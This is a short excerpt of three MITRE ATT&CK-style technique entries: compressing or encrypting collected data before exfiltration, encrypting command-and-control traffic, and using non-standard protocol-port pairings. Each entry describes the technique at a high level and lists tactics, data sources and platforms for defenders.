Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre